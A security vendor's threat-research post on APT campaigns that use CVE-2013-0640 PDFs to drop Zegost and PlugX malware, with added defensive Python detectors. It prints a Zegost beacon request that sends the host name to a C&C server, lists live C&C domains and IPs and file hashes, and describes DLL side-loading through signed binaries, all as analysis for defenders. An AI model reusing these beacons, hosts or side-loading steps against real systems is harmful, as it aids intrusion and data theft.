
Malicious PDFs On The Rise

  • Posted on: April 29, 2013 at 1:06 am
  • Posted in: Malware, Targeted Attacks
  • Author: Nart Villeneuve (Senior Threat Researcher)

Additional text and analysis by Kyle Wilhoit

Throughout 2012, we saw a wide variety of APT campaigns leverage an exploit in Microsoft Word (CVE-2012-0158). This represented a shift, as previously CVE-2010-3333 was the most commonly used Word vulnerability. While we continue to see CVE-2012-0158 in heavy use, we have noticed increasing use of an exploit for Adobe Reader (CVE-2013-0640) that was made infamous by the “MiniDuke” campaign. The malware dropped by these malicious PDFs is not associated with MiniDuke, but it is associated with ongoing APT campaigns.

Zegost

One set of malicious PDFs we found that used this exploit contained decoy documents in Vietnamese; the file names were also in the same language.


Figure 1. Sample decoy document

The PDFs contain embedded JavaScript code that is similar to the code used by the MiniDuke campaign, including similar function and variable names.


Figure 2. Similar JavaScript code

Analyzing the PDFs using Didier Stevens’ PDFiD tool shows that the two files are very similar. They may not be identical, but the similarities between the two are hard to deny. The fields of interest here are “/JavaScript”, “/OpenAction”, and “/Page”: they indicate, respectively, that JavaScript is present, that an action runs automatically when the document is opened, and how many page objects the file contains. These three items helped us identify the similarities between MiniDuke and Zegost.
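The following is an added example, not code from the post or from PDFiD itself: a minimal PDFiD-style keyword counter run over a constructed one-page PDF whose catalog auto-runs a JavaScript action (the sample, the `triage` rules and `profile_diff` are this example's own assumptions). It shows why the three fields above are read together, and that the count survives a hex-escaped name such as `/Java#53cript`.

```python
import re

# Keywords PDFiD tallies; the post singles out /JavaScript, /OpenAction and /Page.
KEYWORDS = ["/Page", "/Encrypt", "/ObjStm", "/JavaScript", "/AA", "/OpenAction",
            "/AcroForm", "/JBIG2Decode", "/RichMedia", "/Launch", "/EmbeddedFile", "/XFA"]

# Constructed sample (not one of the post's files): a one-page PDF whose
# catalog auto-runs a JavaScript action, with the action name partly hex-escaped.
SAMPLE_PDF = (
    b"%PDF-1.4\n"
    b"1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R "
    b"/AcroForm << /XFA 5 0 R >> >> endobj\n"
    b"2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj\n"
    b"3 0 obj << /Type /Page /Parent 2 0 R >> endobj\n"
    b"4 0 obj << /S /Java#53cript /JS (app.alert(1)) >> endobj\n"
    b"5 0 obj << /Length 3 >> stream\nabc\nendstream endobj\n"
    b"trailer << /Root 1 0 R >>\n%%EOF\n"
)

def count_keywords(data: bytes) -> dict:
    """Count PDF name keywords the way PDFiD does, after undoing #xx escapes."""
    # /Java#53cript is the same name as /JavaScript; normalise before matching.
    data = re.sub(rb"#([0-9A-Fa-f]{2})", lambda m: bytes([int(m.group(1), 16)]), data)
    counts = {}
    for kw in KEYWORDS:
        # A name ends at a delimiter, so /Page must not also count /Pages.
        counts[kw] = len(re.findall(re.escape(kw.encode()) + rb"(?![A-Za-z0-9])", data))
    return counts

def triage(counts: dict) -> list:
    """Reasons a file deserves a closer look, judged from the counts alone."""
    reasons = []
    if counts["/JavaScript"] and counts["/OpenAction"]:
        reasons.append("JavaScript is present and an action runs automatically on open")
    if counts["/Encrypt"]:
        reasons.append("file is encrypted: the script sits in an encrypted stream and "
                       "must be decrypted before it can be read")
    if counts["/XFA"]:
        reasons.append("XFA form present")
    return reasons

def profile_diff(a: dict, b: dict) -> dict:
    """Keywords whose counts differ between two files, as in the post's comparison."""
    return {k: (a[k], b[k]) for k in KEYWORDS if a[k] != b[k]}

if __name__ == "__main__":
    c = count_keywords(SAMPLE_PDF)
    for kw in KEYWORDS:
        print(f"{kw:<16}{c[kw]}")
    print(triage(c))
```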

The dropped files and data are also similar. Both campaigns drop the same number of files, with very similar file names, with similar purposes. Even the registry modifications are not too dissimilar.

However, that is where the similarities end. The payload dropped by these PDFs is known as Zegost (or HTTPTunnel) and has been spotted in previous attacks. It has no connection with the MiniDuke malware payload. The Zegost malware has a distinct beacon:

GET /cgi/online.asp?hostname=[COMPUTERNAME]&httptype=[1][not%20httptunnel] HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
Host: dns.yimg.ca
Cache-Control: no-cache

The command and control server, dns.yimg.ca, resolves to 223.26.55.122, an address that has also been used by the better-known command and control servers imm.conimes.com and iyy.conimes.com. The email address used to register this domain, llssddzz@gmail.com, has also been used to register scvhosts.com (another known C&C server) and updata-microsoft.com, which is probably also a threat.
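As an added example (not from the post), the beacon above turned into detection logic run over constructed proxy log lines. The log format and the sample lines are assumptions; the path and query shape, the User-Agent, and the C&C hosts come from the post. The beacon pattern is scored separately from the host list so that a new server using the same beacon still surfaces, while the old IE6 User-Agent alone is not enough to flag a request.

```python
import re
from urllib.parse import urlsplit

# Indicators taken from the post: the beacon's path and query shape, its
# User-Agent, and the C&C hosts and address it names.
BEACON_RE = re.compile(r"/cgi/online\.asp\?hostname=[^&\s]+&httptype=[^&\s]+", re.I)
ZEGOST_UA = "Mozilla/4.0 (compatible; MSIE 6.0; Win32)"
KNOWN_C2 = {"dns.yimg.ca", "223.26.55.122", "imm.conimes.com", "iyy.conimes.com",
            "scvhosts.com", "updata-microsoft.com"}

# Assumed log format: <client> <method> <url> "<user-agent>" per line.
LOG_RE = re.compile(r'^(?P<src>\S+) (?P<method>[A-Z]+) (?P<url>\S+) "(?P<ua>[^"]*)"$')

# Constructed proxy log lines, not traffic captured from the post's samples.
SAMPLE_LOG = """\
10.0.0.5 GET http://dns.yimg.ca/cgi/online.asp?hostname=WS-042&httptype=1 "Mozilla/4.0 (compatible; MSIE 6.0; Win32)"
10.0.0.7 GET http://www.example.com/index.html "Mozilla/5.0 (Windows NT 6.1)"
10.0.0.9 GET http://198.51.100.20/cgi/online.asp?hostname=LAPTOP-7&httptype=not%20httptunnel "Mozilla/4.0 (compatible; MSIE 6.0; Win32)"
10.0.0.9 GET http://www.example.com/cgi/online.asp?id=7 "Mozilla/4.0 (compatible; MSIE 6.0; Win32)"
"""

def detect_zegost(log_text: str) -> list:
    """Return (client, host, reasons) for requests that look like Zegost beacons."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        host = urlsplit(m["url"]).hostname or ""
        reasons = []
        if BEACON_RE.search(m["url"]):
            reasons.append("beacon path and query")   # strongest signal; catches new infrastructure
        if host in KNOWN_C2:
            reasons.append("known C&C host")
        # The IE6 User-Agent is common in old tooling; only count it alongside another signal.
        if reasons and m["ua"] == ZEGOST_UA:
            reasons.append("Zegost User-Agent")
        if reasons:
            hits.append((m["src"], host, reasons))
    return hits

if __name__ == "__main__":
    for src, host, why in detect_zegost(SAMPLE_LOG):
        print(f"{src} -> {host}: {', '.join(why)}")
```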

PlugX

The second set of malicious PDFs is not necessarily directly related to one another, although all of them drop different PlugX variants. The attacks we analyzed appear to have been sent to targets in Japan, South Korea, and India.

However, although these attacks also exploit CVE-2013-0640, they are different from the samples discussed above. When comparing the files, one can see the differences, such as the PDF version being used:

 Keyword           Zegost     MiniDuke   PlugX
 PDF Header        %PDF-1.4   %PDF-1.4   %PDF-1.7
 obj               8          8          43
 endobj            8          8          44
 stream            3          1          10
 endstream         3          2          11
 xref              1          1          4
 trailer           1          1          4
 startxref         1          1          4
 /Page             1          1          6
 /Encrypt          0          1          0
 /ObjStm           0          0          0
 /JavaScript       1          1          1
 /AA               0          0          0
 /OpenAction       1          1          1
 /AcroForm         1          1          1
 /JBIG2Decode      0          0          0
 /RichMedia        0          0          0
 /Launch           0          0          0
 /EmbeddedFile     0          0          0
 /XFA              1          1          1
 /Colors > 2^24    0          0          0

PlugX also drops files and data, but these are not similar to those of Zegost or MiniDuke. Different numbers of files, for different reasons, are dropped (file name and MD5 hash):

Zegost
  UserCache.bin              39f5d27d1a5e34ce9863406b799ef47a
  ACECache10.lst             a1bb36552f1336466b4d728948393585
  A9RD50B.tmp (PDF)          dd28e2e06465464f0cb5eca4a9013421
  A9RD50A.tmp (PDF)          4f4ceedd8da84be88dbea7b49f1b82e5

MiniDuke
  UserCache.bin              39f5d27d1a5e34ce9863406b799ef47a
  ACECache10.lst             77402ee32c656d68eeb8a07e2a041dfb
  A9RE077.tmp (PDF)          85b890c0b10faa13014d4a22dae3fe3c
  A9RE078.tmp (PDF)          e719894252665a7cbf8efc18babdd70e

PlugX
  UserCache.bin              39f5d27d1a5e34ce9863406b799ef47a
  ACECache10.lst             77e16369d995628ff9df31c56129a2f2
  SharedDataEvents           1a8d23271be2c45f31a537eaefbbf55d
  SharedDataEvents-journal   4754e6d5ea3b6ca2357146a1e56c3c47
  SharedDataEvents-journal   b16f24e72c42059cd44a9fb48ea8bf98
  A9RD53D.tmp (PDF)          200569e47e6e5a3f629533423d4ba03b
  SharedDataEvents-journal   b930ef3a77e6c4669312f582fc405f61
  SharedDataEvents-journal   38149cfb66075a9009d460e86c138141
  SharedDataEvents-journal   566ea4be505009d422d5fd6c395a33b9
  A9RD53C.tmp (PDF)          ca79b7a45410dd1e995a4997dcc6d126

PlugX: HHX

The first set of PlugX variants leverages the Microsoft HTML Help Compiler as described in this blog post. We have been able to detect this variant used in a targeted attack. In this case, the attackers sent an email to the intended target enticing them to open the malicious attachments.

The samples we analyzed dropped files in a directory named hhx and use hhc.exe, a legitimate Microsoft file, to load hha.dll, which then loads hha.dll.bak. The command and control servers used by the files we analyzed included 14.102.252.142.

PlugX: PDH

The second set of PlugX variants we analyzed dropped files in a directory named PDH and leveraged a signed QQ Browser Update Service file to load PDH.dll, and then PDH.pak.


Figure 3. Signed file

These files used dnsport.chatnook.com, inter.so-webmail.com, and 223.25.242.45 as their command-and-control servers.
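Both PlugX variants above follow the same pattern: a legitimate, signed executable is dropped into a working directory (hhx or PDH) beside a DLL it loads, and that DLL reads a follow-on payload file (hha.dll.bak or PDH.pak). The check below is an added example, not the post's or any product's code, run over constructed image-load events; the event format, the trusted roots and the executable name "QQUpdater.exe" (a placeholder, since the post only names the service) are assumptions. It keeps the genuine Windows pdh.dll in System32 and a real HTML Help Workshop install from being flagged.

```python
from pathlib import PureWindowsPath

# Loader DLL -> the follow-on payload file the post says it loads next.
WATCHED_DLLS = {"hha.dll": "hha.dll.bak", "pdh.dll": "pdh.pak"}
# Working directory names the post reports for the two PlugX variants.
DROP_DIRS = {"hhx", "pdh"}
# Assumed locations where these DLLs legitimately live (pdh.dll is also a genuine Windows DLL).
TRUSTED_ROOTS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")

# Constructed image-load events: (loading process, module loaded). Not from the post.
SAMPLE_EVENTS = [
    (r"C:\Users\alice\AppData\Roaming\hhx\hhc.exe", r"C:\Users\alice\AppData\Roaming\hhx\hha.dll"),
    (r"C:\Program Files (x86)\HTML Help Workshop\hhc.exe", r"C:\Program Files (x86)\HTML Help Workshop\hha.dll"),
    # "QQUpdater.exe" is a placeholder name for the signed QQ Browser Update Service binary.
    (r"C:\ProgramData\PDH\QQUpdater.exe", r"C:\ProgramData\PDH\PDH.dll"),
    (r"C:\Windows\explorer.exe", r"C:\Windows\System32\pdh.dll"),
]

def flag_sideloads(events) -> list:
    """Return (process, module, expected_payload) for suspicious loads of the watched DLLs."""
    hits = []
    for proc, module in events:
        p, m = PureWindowsPath(proc), PureWindowsPath(module)
        dll = m.name.lower()
        if dll not in WATCHED_DLLS:
            continue
        module_dir = str(m.parent).lower() + "\\"
        if module_dir.startswith(TRUSTED_ROOTS):
            continue  # genuine install, or the real Windows pdh.dll
        beside_loader = p.parent == m.parent            # DLL planted next to a copied loader
        in_drop_dir = m.parent.name.lower() in DROP_DIRS  # directory name the post reports
        if beside_loader or in_drop_dir:
            # The payload path is where the follow-on file would be, worth collecting for analysis.
            hits.append((proc, module, str(m.parent / WATCHED_DLLS[dll])))
    return hits

if __name__ == "__main__":
    for proc, module, payload in flag_sideloads(SAMPLE_EVENTS):
        print(f"{proc} loaded {module}; expect payload at {payload}")
```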

Conclusion

Our research indicates that attackers engaged in APT campaigns may have adapted the exploit made infamous by the MiniDuke campaign and incorporated it into their arsenal. At the same time, we have found that other APT campaigns seem to have developed their own methods to exploit the same vulnerability. The increase in malicious PDFs exploiting CVE-2013-0640 may indicate the start of a shift in APT attacker behavior away from malicious Word documents that exploit the now quite old CVE-2012-0158.

Tags: APT, Exploits, Microsoft Office, pdf, Reader